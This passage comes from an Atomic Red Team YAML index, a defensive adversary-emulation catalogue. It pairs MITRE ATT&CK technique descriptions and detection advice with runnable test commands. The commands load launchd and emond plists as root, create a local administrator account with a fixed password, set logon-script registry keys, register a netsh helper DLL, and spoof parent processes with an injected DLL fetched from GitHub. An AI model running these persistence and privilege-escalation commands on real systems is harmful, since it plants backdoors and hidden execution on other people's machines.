description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and - try again."; exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} - sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | - sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} - sudo rm /Library/LaunchDaemons/#{plist_filename} - T1053.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.004 - url: https://attack.mitre.org/techniques/T1053/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launchd - description: |- - Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). - - An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. - id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:41:14.739Z' - created: '2019-12-03T14:15:27.452Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - root - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring - x_mitre_platforms: - - macOS - identifier: T1053.004 - atomic_tests: - - name: Event Monitor Daemon Persistence - auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - description: "This test adds persistence via a plist to execute via the macOS - Event Monitor Daemon. \n" - supported_platforms: - - macos - input_arguments: - script_location: - description: evil plist location - type: path - default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" - script_destination: - description: Path where to move the evil plist - type: path - default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" - empty_file: - description: Random name of the empty file used to trigger emond service - type: string - default: randomflag - executor: - name: bash - elevation_required: true - command: | - sudo cp #{script_location} #{script_destination} - sudo touch /private/var/db/emondClients/#{empty_file} - cleanup_command: | - sudo rm #{script_destination} - sudo rm /private/var/db/emondClients/#{empty_file} - T1078.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts - description: "Adversaries may obtain and abuse credentials of a local account - as a means of gaining Initial Access, Persistence, Privilege Escalation, or - Defense Evasion. Local accounts are those configured by an organization for - use by users, remote support, services, or for administration on a single - system or service.\n\nLocal Accounts may also be abused to elevate privileges - and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). - Password reuse may allow the abuse of local accounts across a set of machines - on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' - created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1078.003 - atomic_tests: - - name: Create local account with admin priviliges - auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - description: After execution the new account will be active and added to the - Administrators group - supported_platforms: - - windows - executor: - command: |- - net user art-test /add - net user art-test Password123! - net localgroup administrators art-test /add - cleanup_command: |- - net localgroup administrators art-test /delete >nul 2>&1 - net user art-test /delete >nul 2>&1 - name: command_prompt - elevation_required: true - T1037.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.002 - url: https://attack.mitre.org/techniques/T1037/002 - - url: https://support.apple.com/de-at/HT2420 - description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved - July 17, 2017.' - source_name: creating login hook - - source_name: S1 macOs Persistence - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved - March 27, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Logon Script (Mac) - description: "Adversaries may use macOS logon scripts automatically executed - at logon initialization to establish persistence. macOS allows logon scripts - (known as login hooks) to be executed whenever a specific user logs into a - system. A login hook tells Mac OS X to execute a certain script when a user - logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), - a login hook executes as the elevated root user.(Citation: creating login - hook)\n\nAdversaries may use these login hooks to maintain persistence on - a single system.(Citation: S1 macOs Persistence) Access to login hook scripts - may allow an adversary to insert additional malicious code. There can only - be one login hook at a time though and depending on the access configuration - of the hooks, either local credentials or an administrator account may be - necessary. " - id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-27T16:49:15.786Z' - created: '2020-01-10T16:01:15.995Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - identifier: T1037.002 - atomic_tests: - - name: Logon Scripts - Mac - auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - description: 'Mac logon script - -' - supported_platforms: - - macos - executor: - steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. - Populate the plist with the location of your shell script\n\n sudo defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. - Create the required plist file in the target user's Preferences directory\n\n\t - \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. - Populate the plist with the location of your shell script\n\n\t defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" - name: manual - T1037.001: - technique: - id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 - description: "Adversaries may use Windows logon scripts automatically executed - at logon initialization to establish persistence. Windows allows logon scripts - to be run whenever a specific user or group of users log into a system.(Citation: - TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript - Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these - scripts to maintain persistence on a single system. Depending on the access - configuration of the logon scripts, either local credentials or an administrator - account may be necessary. " - name: Logon Script (Windows) - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.001 - url: https://attack.mitre.org/techniques/T1037/001 - - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx - description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved - April 27, 2016. - source_name: TechNet Logon Scripts - - source_name: Hexacorn Logon Scripts - url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ - description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part - 18. Retrieved November 15, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:03.153Z' - created: '2020-01-10T03:43:37.211Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. - - Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.001 - atomic_tests: - - name: Logon Scripts - auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - description: | - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key - that can be viewed in the Registry Editor. - supported_platforms: - - windows - input_arguments: - script_path: - description: Path to .bat file - type: String - default: "%temp%\\art.bat" - script_command: - description: Command To Execute - type: String - default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt - executor: - command: | - echo "#{script_command}" > #{script_path} - REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f - cleanup_command: | - REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 - del #{script_path} >nul 2>&1 - del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 - name: command_prompt - T1134.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.003 - url: https://attack.mitre.org/techniques/T1134/003 - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Make and Impersonate Token - description: Adversaries may make and impersonate tokens to escalate privileges - and bypass access controls. If an adversary has a username and password but - the user is not logged onto the system, the adversary can then create a logon - session for the user using the LogonUser function. The function - will return a copy of the new session's access token and the adversary can - use SetThreadToken to assign the token to a thread. - id: attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-02-18T18:03:37.481Z' - created: '2020-02-18T18:03:37.481Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - x_mitre_detection: |- - If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) - - If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. - - Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.007: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.007 - url: https://attack.mitre.org/techniques/T1546/007 - - url: https://technet.microsoft.com/library/bb490939.aspx - description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. - source_name: TechNet Netsh - - url: https://github.com/outflankbv/NetshHelperBeacon - description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved - February 13, 2017. - source_name: Github Netsh Helper CS Beacon - - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html - description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL - DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. - source_name: Demaske Netsh Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Netsh Helper DLL - description: |- - Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. - - Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) - id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T18:28:07.793Z' - created: '2020-01-24T14:26:51.207Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes - in most environments. Monitor process executions and investigate any child - processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh - registry key for any new or suspicious entries that do not correlate with - known system files or benign software. (Citation: Demaske Netsh Persistence)' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - - DLL monitoring - x_mitre_contributors: - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1546.007 - atomic_tests: - - name: Netsh Helper DLL Registration - auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files - -' - supported_platforms: - - windows - input_arguments: - helper_file: - description: Path to DLL - type: Path - default: C:\Path\file.dll - executor: - command: 'netsh.exe add helper #{helper_file} - -' - name: command_prompt - T1037.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.003 - url: https://attack.mitre.org/techniques/T1037/003 - - source_name: Petri Logon Script AD - url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 - description: Daniel Petri. (2009, January 8). Setting up a Logon Script through - Active Directory Users and Computers in Windows Server 2008. Retrieved November - 15, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Network Logon Script - description: "Adversaries may use network logon scripts automatically executed - at logon initialization to establish persistence. Network logon scripts can - be assigned using Active Directory or Group Policy Objects.(Citation: Petri - Logon Script AD) These logon scripts run with the privileges of the user they - are assigned to. Depending on the systems within the network, initializing - one of these scripts could apply to more than one or potentially all systems. - \ \n \nAdversaries may use these scripts to maintain persistence on a network. - Depending on the access configuration of the logon scripts, either local credentials - or an administrator account may be necessary." - id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:25.625Z' - created: '2020-01-10T18:01:03.666Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1134.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.004 - url: https://attack.mitre.org/techniques/T1134/004 - - source_name: DidierStevens SelectMyParent Nov 2009 - url: https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ - description: 'Stevens, D. (2009, November 22). Quickpost: SelectMyParent or - Playing With the Windows Process Tree. Retrieved June 3, 2019.' - - source_name: Microsoft UAC Nov 2018 - url: https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works - description: Montemayor, D. et al.. (2018, November 15). How User Account - Control works. Retrieved June 3, 2019. - - source_name: CounterCept PPID Spoofing Dec 2018 - url: https://www.countercept.com/blog/detecting-parent-pid-spoofing/ - description: Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved - June 3, 2019. - - source_name: CTD PPID Spoofing Macro Mar 2019 - url: https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ - description: Tafani-Dereeper, C. (2019, March 12). Building an Office macro - to spoof parent processes and command line arguments. Retrieved June 3, - 2019. - - source_name: XPNSec PPID Nov 2017 - url: https://blog.xpnsec.com/becoming-system/ - description: Chester, A. (2017, November 20). Alternative methods of becoming - SYSTEM. Retrieved June 4, 2019. - - source_name: Microsoft Process Creation Flags May 2018 - url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags - description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. - Retrieved June 4, 2019. - - description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) - Ataware Ransomware Part 3. Retrieved June 6, 2019. - url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 - source_name: Secuirtyinbits Ataware3 May 2019 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Parent PID Spoofing - description: |- - Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) - - Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) - - Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) - id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.030Z' - created: '2020-02-18T18:22:41.448Z' - x_mitre_contributors: - - Wayne Silva, F-Secure Countercept - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_defense_bypassed: - - Heuristic Detection - - Host forensic analysis - x_mitre_detection: |- - Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018) - - Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible. - x_mitre_data_sources: - - API monitoring - - Process monitoring - - Windows event logs - x_mitre_platforms: - - Windows - identifier: T1134.004 - atomic_tests: - - name: Parent PID Spoofing using PowerShell - auto_generated_guid: '069258f4-2162-46e9-9a25-c9c6c56150d2' - description: | - This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. - Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and - calc.exe will be launched. - - Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) - supported_platforms: - - windows - input_arguments: - parent_process_name: - description: Name of the parent process - type: string - default: explorer - spawnto_process_path: - description: Path of the process to spawn - type: path - default: C:\Program Files\Internet Explorer\iexplore.exe - dll_process_name: - description: Name of the created process from the injected dll - type: string - default: calculator - dll_path: - description: Path of the dll to inject - type: path - default: PathToAtomicsFolder\T1134.004\bin\calc.dll - spawnto_process_name: - description: Name of the process to spawn - type: string - default: iexplore - dependency_executor_name: powershell - dependencies: - - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - -' - prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" - executor: - command: | - . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 - $ppid=Get-Process #{parent_process_name} | select -expand id - PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}" - cleanup_command: | - Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore - Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - name: powershell - - name: Parent PID Spoofing - Spawn from Current Process - auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 - description: Spawns a powershell.exe process as a child of the current process. - supported_platforms: - - windows - input_arguments: - file_path: - description: File path or name of process to spawn - type: path - default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" - parent_pid: - description: PID of process to spawn from - type: string - default: "$PID" - command_line: - description: Specified command line to use - type: string - default: "-Command Start-Sleep 10" - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. - prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine - ''#{command_line}'' -ParentId #{parent_pid}' - name: powershell - - name: Parent PID Spoofing - Spawn from Specified Process - auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb - description: Spawns a notepad.exe process as a child of the current process. - supported_platforms: - - windows - input_arguments: - parent_pid: - description: PID of process to spawn from - type: string - default: "$PID" - test_guid: - description: Defined test GUID - type: string - default: 12345678-1234-1234-1234-123456789123 - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. - prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid - #{test_guid}' - name: powershell - - name: Parent PID Spoofing - Spawn from svchost.exe - auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 - description: Spawnd a process as a child of the first accessible svchost.exe - process. - supported_platforms: - - windows - input_arguments: - command_line: - description: Specified command line to use - type: string - default: "-Command Start-Sleep 10" - file_path: - description: File path or name of process to spawn - type: path - default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. - prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, - ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | - Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} - -CommandLine ''#{command_line}''' - name: powershell - - name: Parent PID Spoofing - Spawn from New Process - auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db - description: Creates a notepad.exe process and then spawns a powershell.exe - process as a child of it. - supported_platforms: - - windows - input_arguments: - command_line: - description: Specified command line to use - type: string - default: "-Command Start-Sleep 10" - file_path: - description: File path or name of process to spawn - type: path - default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" - parent_name: - description: Parent process to spoof from - type: path - default: "$Env:windir\\System32\\notepad.exe" - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. - prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent - -FilePath #{file_path} -CommandLine ''#{command_line}''' - name: powershell - T1034: - technique: - id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception - description: |- - **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** - - Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) - - There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. - - ### Unquoted Paths - Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted 